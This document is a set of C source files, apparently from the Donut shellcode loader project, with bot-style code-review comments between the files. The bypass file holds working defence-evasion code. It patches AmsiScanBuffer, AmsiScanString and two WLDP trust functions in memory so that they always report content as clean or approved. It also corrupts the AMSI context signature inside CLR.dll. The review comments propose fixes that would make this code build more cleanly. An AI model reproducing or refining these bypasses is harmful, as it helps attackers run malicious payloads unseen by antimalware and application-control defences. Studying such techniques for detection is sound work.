373 /* [in] */ const VARIANT *pvarResult,
374 /* [in] */ const EXCEPINFO *pexcepinfo);
375
376 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
377 IActiveScriptSite * This,
378 /* [in] */ SCRIPTSTATE ssScriptState);
379
380 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
381 IActiveScriptSite * This,
382 /* [in] */ IActiveScriptError *pscripterror);
383
384 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
385 IActiveScriptSite * This);
386
387 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
388 IActiveScriptSite * This);
389
390 END_INTERFACE
391 } IActiveScriptSiteVtbl;
392
393 typedef struct _IActiveScriptSite {
394 IActiveScriptSiteVtbl *lpVtbl;
395 ULONG m_cRef;
396 } ActiveScriptSite;
397
398 #ifdef _WIN64
399 #define IActiveScriptParse IActiveScriptParse64
400 #define IID_IActiveScriptParse IID_IActiveScriptParse64
401 #else
402 #define IActiveScriptParse IActiveScriptParse32
403 #define IID_IActiveScriptParse IID_IActiveScriptParse32
404 #endif
405
406 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
407
408 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
409 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
410 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
411
412 // Informs the host that the scripting engine has begun executing the script code.
413 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
414
415 // Informs the host that the scripting engine has returned from executing script code.
416 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
417
418 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
419 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
420
421 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
422 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
423
424 // Informs the host that an execution error occurred while the engine was running the script.
425 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
426
427 // Informs the host that the scripting engine has changed states.
428 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
429
430 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
431 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
432
433 // Called when the script has completed execution.
434 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
435
436 // ################################################# IActiveScriptSiteWindow ###############################################
437 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this);
438
439 // IUnknown
440 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv);
441 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this);
442 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this);
443
444 // IActiveScriptSiteWindow
445 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd);
446 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable);
447
448 #endif
449
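Review bot: The prototypes at the end of activescript.h are declared `static`, so any translation unit that includes this header without also compiling the definitions gets "declared static but never defined" diagnostics; a header comment such as `// Intended to be included only from the file that defines these functions.` would make that constraint explicit. The parameter names in the prototypes also drift from the definitions — `GetLCID(..., LCID *lcid)` versus `plcid`, `GetItemInfo(..., ITypeInfo **typeInfo)` versus `ppti` — which the compiler accepts but which confuses side-by-side reading. Since the `SCRIPT*` constants, enums and vtable layouts appear to mirror the SDK's activscp.h definitions, a one-line note saying so (and that member order must match the SDK vtables exactly) would help the next maintainer verify them against the SDK rather than trusting them blindly.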
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate them
69 // from the compiled code. Null subroutines are eliminated, so the body of
70 // function needs to do something.
71
72 int AmsiScanBufferStubEnd(int a, int b) {
73 return a * b;
74 }
75
76 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
77 HRESULT WINAPI AmsiScanStringStub(
78 HAMSICONTEXT amsiContext,
79 LPCWSTR string,
80 LPCWSTR contentName,
81 HAMSISESSION amsiSession,
82 AMSI_RESULT *result)
83 {
84 *result = AMSI_RESULT_CLEAN;
85 return S_OK;
86 }
87
88 int AmsiScanStringStubEnd(int a, int b) {
89 return a + b;
90 }
91
92 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
93 HMODULE dll;
94 DWORD len, op, t;
95 LPVOID cs;
96
97 // try load amsi. if unable, assume DLL doesn't exist
98 // and return TRUE to indicate it's okay to continue
99 dll = inst->api.LoadLibraryA(inst->amsi);
100 if(dll == NULL) return TRUE;
101
102 // resolve address of AmsiScanBuffer. if not found,
103 // return FALSE because it should exist ...
104 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
105 if(cs == NULL) return FALSE;
106
107 // calculate length of stub
108 len = (ULONG_PTR)AmsiScanBufferStubEnd -
109 (ULONG_PTR)AmsiScanBufferStub;
110
111 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
112
113 // check for negative length. this would only happen when
114 // compiler decides to re-order functions.
115 if((int)len < 0) return FALSE;
116
117 // make the memory writeable. return FALSE on error
118 if(!inst->api.VirtualProtect(
119 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
120
121 DPRINT("Overwriting AmsiScanBuffer");
122 // over write with virtual address of stub
123 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
124 // set memory back to original protection
125 inst->api.VirtualProtect(cs, len, op, &t);
126
127 // resolve address of AmsiScanString. if not found,
128 // return FALSE because it should exist ...
129 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
130 if(cs == NULL) return FALSE;
131
132 // calculate length of stub
133 len = (ULONG_PTR)AmsiScanStringStubEnd -
134 (ULONG_PTR)AmsiScanStringStub;
135
136 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
137
138 // check for negative length. this would only happen when
139 // compiler decides to re-order functions.
140 if((int)len < 0) return FALSE;
141
142 // make the memory writeable
143 if(!inst->api.VirtualProtect(
144 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
145
146 DPRINT("Overwriting AmsiScanString");
147 // over write with virtual address of stub
148 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
149 // set memory back to original protection
150 inst->api.VirtualProtect(cs, len, op, &t);
151
152 return TRUE;
153 }
154
155 #elif defined(BYPASS_AMSI_B)
156
157 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
158 HMODULE dll;
159 PBYTE cs;
160 DWORD i, op, t;
161 BOOL disabled = FALSE;
162 PDWORD Signature;
163
164 // try load amsi. if unable to load, assume
165 // it doesn't exist and return TRUE to indicate
166 // it's okay to continue.
167 dll = inst->api.LoadLibraryA(inst->amsi);
168 if(dll == NULL) return TRUE;
169
170 // resolve address of AmsiScanBuffer. if unable, return
171 // FALSE because it should exist.
172 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
173 if(cs == NULL) return FALSE;
174
175 // scan for signature
176 for(i=0;;i++) {
177 Signature = (PDWORD)&cs[i];
178 // is it "AMSI"?
179 if(*Signature == *(PDWORD)inst->amsi) {
180 // set memory protection for write access
181 inst->api.VirtualProtect(cs, sizeof(DWORD),
182 PAGE_EXECUTE_READWRITE, &op);
183
184 // change signature
185 *Signature++;
186
187 // set memory back to original protection
188 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
189 disabled = TRUE;
190 break;
191 }
192 }
193 return disabled;
194 }
195
196 #elif defined(BYPASS_AMSI_C)
197
198 // Attempt to find AMSI context in .data section of CLR.dll
199 // Could also scan PEB.ProcessHeap for this..
200 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
201 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
202
203 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
204 LPVOID clr;
205 BOOL disabled = FALSE;
206 PIMAGE_DOS_HEADER dos;
207 PIMAGE_NT_HEADERS nt;
208 PIMAGE_SECTION_HEADER sh;
209 DWORD i, j, res;
210 PBYTE ds;
211 MEMORY_BASIC_INFORMATION mbi;
212 _PHAMSICONTEXT ctx;
213
214 // get address of CLR.dll. if unable, this
215 // probably isn't a dotnet assembly being loaded
216 clr = inst->api.GetModuleHandleA(inst->clr);
217 if(clr == NULL) return FALSE;
218
219 dos = (PIMAGE_DOS_HEADER)clr;
220 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
221 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
222 nt->FileHeader.SizeOfOptionalHeader);
223
224 // scan all writeable segments while disabled == FALSE
225 for(i = 0;
226 i < nt->FileHeader.NumberOfSections && !disabled;
227 i++)
228 {
229 // if this section is writeable, assume it's data
230 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
231 // scan section for pointers to the heap
232 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
233
234 for(j = 0;
235 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
236 j += sizeof(ULONG_PTR))
237 {
238 // get pointer
239 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
240 // query if the pointer
241 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
242 if(res != sizeof(mbi)) continue;
243
244 // if it's a pointer to heap or stack
245 if ((mbi.State == MEM_COMMIT ) &&
246 (mbi.Type == MEM_PRIVATE ) &&
247 (mbi.Protect == PAGE_READWRITE))
248 {
249 ctx = (_PHAMSICONTEXT)ptr;
250 // check if it contains the signature
251 if(ctx->Signature == *(PDWORD*)inst->amsi) {
252 // corrupt it
253 ctx->Signature++;
254 disabled = TRUE;
255 break;
256 }
257 }
258 }
259 }
260 }
261 return disabled;
262 }
263
264 #elif defined(BYPASS_AMSI_D)
265 // This is where you may define your own AMSI bypass.
266 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
267
268 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
269
270 }
271
272 #endif
273
274 #if defined(BYPASS_WLDP_A)
275
276 // fake function that always returns S_OK and isApproved = TRUE
277 HRESULT WINAPI WldpIsClassInApprovedListStub(
278 REFCLSID classID,
279 PWLDP_HOST_INFORMATION hostInformation,
280 PBOOL isApproved,
281 DWORD optionalFlags)
282 {
283 *isApproved = TRUE;
284 return S_OK;
285 }
286
287 // make sure prototype and code are different from other subroutines
288 // to avoid removal by MSVC
289 int WldpIsClassInApprovedListStubEnd(int a, int b) {
290 return a - b;
291 }
292
293 // fake function that always returns S_OK
294 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
295 HANDLE fileHandle,
296 PVOID baseImage,
297 ULONG ImageSize)
298 {
299 return S_OK;
300 }
301
302 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
303 return a / b;
304 }
305
306 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
307 HMODULE wldp;
308 DWORD len, op, t;
309 LPVOID cs;
310
311 // try load wldp. if unable, assume DLL doesn't exist
312 // and return TRUE to indicate it's okay to continue
313 wldp = inst->api.LoadLibraryA(inst->wldp);
314 if(wldp == NULL) return TRUE;
315
316 // resolve address of WldpQueryDynamicCodeTrust
317 // if not found, return FALSE because it should exist
318 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
319 if(cs == NULL) return FALSE;
320
321 // calculate length of stub
322 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
323 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
324
325 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
326
327 // check for negative length. this would only happen when
328 // compiler decides to re-order functions.
329 if((int)len < 0) return FALSE;
330
331 // make the memory writeable. return FALSE on error
332 if(!inst->api.VirtualProtect(
333 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
334
335 // overwrite with virtual address of stub
336 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
337 // set back to original protection
338 inst->api.VirtualProtect(cs, len, op, &t);
339
340 // resolve address of WldpIsClassInApprovedList
341 // if not found, return FALSE because it should exist
342 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
343 if(cs == NULL) return FALSE;
344
345 // calculate length of stub
346 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
347 (ULONG_PTR)WldpIsClassInApprovedListStub;
348
349 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
350
351 // check for negative length. this would only happen when
352 // compiler decides to re-order functions.
353 if((int)len < 0) return FALSE;
354
355 // make the memory writeable. return FALSE on error
356 if(!inst->api.VirtualProtect(
357 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
358
359 // overwrite with virtual address of stub
360 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
361 // set back to original protection
362 inst->api.VirtualProtect(cs, len, op, &t);
363
364 return TRUE;
365 }
366 #elif defined(BYPASS_WLDP_B)
367 // This is where you may define your own WLDP bypass.
368 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
369
370 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
371
372 }
373 #endif
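Review bot: The comment above the `BYPASS_AMSI_D` placeholder (gutter 265-266) tells the reader to build with `BYPASS_AMSI_C` defined, which selects the preceding bypass rather than this slot; the parallel `BYPASS_WLDP_B` comment at gutter 367-368 names its own macro correctly, so this one should read `// To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_D defined.`. The two placeholder bodies, `DisableAMSI` at gutter 268-270 and `DisableWLDP` at gutter 370-372, are also empty non-void functions, so a build that selects either slot without filling it in falls off the end of a `BOOL` function, which is undefined behaviour and trips `-Wreturn-type`. Giving each placeholder a `return FALSE;` body makes an unfilled slot behave deterministically and compile cleanly; I am noting it once here since it applies to both.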
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, uint32_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = (unsigned char)value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, uint32_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, uint32_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
74
75 int compare(const char *s1, const char *s2) {
76 while(*s1 && *s2) {
77 if(*s1 != *s2) {
78 return 0;
79 }
80 s1++; s2++;
81 }
82 return *s2 == 0;
83 }
84
85 const char* _strstr(const char *s1, const char *s2) {
86 while (*s1) {
87 if((*s1 == *s2) && compare(s1, s2)) return s1;
88 s1++;
89 }
90 return NULL;
91 }
92
93 int _strcmp(const char *str1, const char *str2) {
94 while (*str1 && *str2) {
95 if(*str1 != *str2) break;
96 str1++; str2++;
97 }
98 return (int)*str1 - (int)*str2;
99 }
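Review bot: `Memcpy` (gutter 53-62) declares `source` as `const void *` but then strips the qualifier with `unsigned char *in = (unsigned char*)source;`, so the promise made by the prototype is not honoured inside the body and `-Wcast-qual` builds warn; `const unsigned char *in = (const unsigned char*)source;` keeps the signature and body consistent. Separately, `_strstr` (gutter 85-91) differs from the C library's `strstr` for an empty `s2`: the standard returns `s1`, whereas this loop only matches when `*s1 == *s2`, so an empty needle always yields `NULL`; a one-line comment such as `// unlike strstr, an empty s2 never matches and NULL is returned` would make that difference deliberate rather than accidental. `Memcmp` (gutter 64-73) also uses the `register` storage class, which modern compilers ignore and C++17 removed, so it can be dropped if this file is ever compiled as C++.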
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
